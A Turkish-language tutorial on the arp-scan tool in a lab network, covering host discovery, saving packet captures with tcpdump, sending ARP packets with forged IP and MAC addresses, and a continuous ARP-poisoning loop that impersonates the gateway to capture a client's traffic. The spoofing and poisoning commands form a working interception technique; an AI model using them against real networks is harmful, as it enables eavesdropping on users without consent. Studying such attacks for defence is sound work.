Linux arp-scan aracının temel kullanımı aşağıdaki gibidir.
arp-scan –h
ARP iletişimin yapılacağı ethernet kartı tespit edilmesi gerekir. Birden fazla ağ kartı varsa, tarama yapılacak ağda bulunan ağ kartı seçilecektir.
ifconfig
Bu yazıda ARP sorgularının gerçekleştirileceği ağ 100.100.200.0/24, ağ kartı eth0, ağ kartına ait MAC adresi 00:50:56:95:0E:D4, ağ kartına ait IP adresi 100.100.200.210, ağın gateway adresi 100.100.200.1’dir.
1) IP Aralığını İnceleme
Aracın temel kullanımında arayüz (eth0) ve ARP sorgularının gönderileceği IP listesi belirtilebilir.
arp-scan -I eth0 100.100.200.10-100.100.200.55
ARP sorgusunu alan ağdaki istemcinin ARP belleğine, sorguyu gönderen tarafın MAC adres ve IP bilgisi düşer. Sorgulamadan önce ağdaki 100.100.200.50 IP adresli istemcide 100.100.200.210’un MAC adresi yokken, ARP sorgusu sonrasında IP ve MAC adresi ARP önbelleğine kaydedilmiştir.
arp -a
2) Tüm Ağı Tarama ve Sonuçları Dosyaya Aktarma
Linux arp-scan aracının gerçekleştirdiği trafiğe ait paketler bir dosyaya da aktarılabilir.
arp-scan -I eth0 100.100.200.0/24 –retry=1 –pcapsavefile=/root/Desktop/ArpTaramasi.pcap
Not: Varsayılan olarak arp-scan aracı ile ağa 3 adet ARP sorgu paketi gönderilir. “–retry ” ile ARP sorgu adedi belirtilebilir.
Paket içerisinde sorgulara ait cevaplar listelenmiştir.
Cevap gelen ARP paketleri yerine bütün ARP paketlerini görmek için Linux tcpdump aracı kullanılabilir.
tcpdump -vv -i eth0 arp -w /root/Desktop/ArpTaramasi_Tcpdump.pcap
Tüm ağı taramak için “–localnet” kullanılabilir.
arp-scan –interface=eth0 –localnet –retry=1
Paket dinleme işlemi durdurulabilir.
Böylece sonuçlar dosyaya kaydedilmiştir.
3) Sahte IP ve MAC ile ARP Paketleri Gönderme
ARP iletişiminde kimlik doğrulaması olmadığı için herhangi bir IP veya MAC adresinden gönderiliyormuş gibi ARP sorgusu da gerçekleştirilebilir.
arp-scan –interface=eth0 –localnet –arpspa=100.100.200.40 –arpsha=AA:BB:CC:DD:EE:FF
Tcpdump ile bu trafik başka bir dosyaya kaydedilebilir. Belirtilen IP ve MAC olarak ARP sorguları gönderilmiştir.
Ağdaki istemci de bu değerleri ARP tablosuna eklemiş olur.
arp -a
4) Ağdaki İstemcinin Ağ Dışına Gönderdiği Paketlerin Elde Edilmesi
İstemci bilgisayarın tüm trafiği Kali bilgisayar üzerine alınabilir. Ağdaki istemci bilgisayarın IP yapılandırması aşağıdaki gibidir.
ipconfig /all
Eğer istemcinin gateway IP adresine (100.100.200.1) ait MAC adresi; Kali’nin MAC (00:50:56:95:0E:D4) gibi gösterilirse, istemcinin ağ dışındaki trafiği Kali üzerinden geçecektir. Sahte MAC adresi aşağıdaki gibi yayın edilebilir.
arp-scan –interface=eth0 –localnet –arpspa=100.100.200.1 –arpsha=00:50:56:95:0E:D4
Böylece istemcinin ARP belleği değiştirilmiş olur. Gateway IP adresi (100.100.200.1) için, sahte ARP paketleri gönderilmeden önceki MAC adresi (00:50:56:95:28:9A) ve gönderildikten sonraki MAC adresi (00:50:56:95:0E:D4) aşağıdaki gibidir.
arp -a
Zehirlenme sırasında istemci taraf ARP sorgusunu bir daha başlatarak Gateway IP adresinin MAC adresini doğru bir şekilde öğrenebilir. Bu sebeple, arp-scan ile ARP zehirlemesi sürekli olmalıdır.
while true; do arp-scan –interface=eth0 100.100.200.50 –arpspa=100.100.200.1 –arpsha=00:50:56:95:0e:d4; sleep 1; done;
Zehirleme işlemi devam ederken, Tcpdump aracı ile istemcinin yaptığı trafik kaydedilebilir.
tcpdump -vv -i eth0 -w /root/Desktop/ArpTaramasi_ArayaGirme_HTTP.pcap
Trafik Kali üzerine gelmiş ancak Kali gelen paketleri hedefe yönlendirmediği ve gelen cevapları da kaynağa geri iletmediği için trafik Kali üzerinde sonlanmıştır.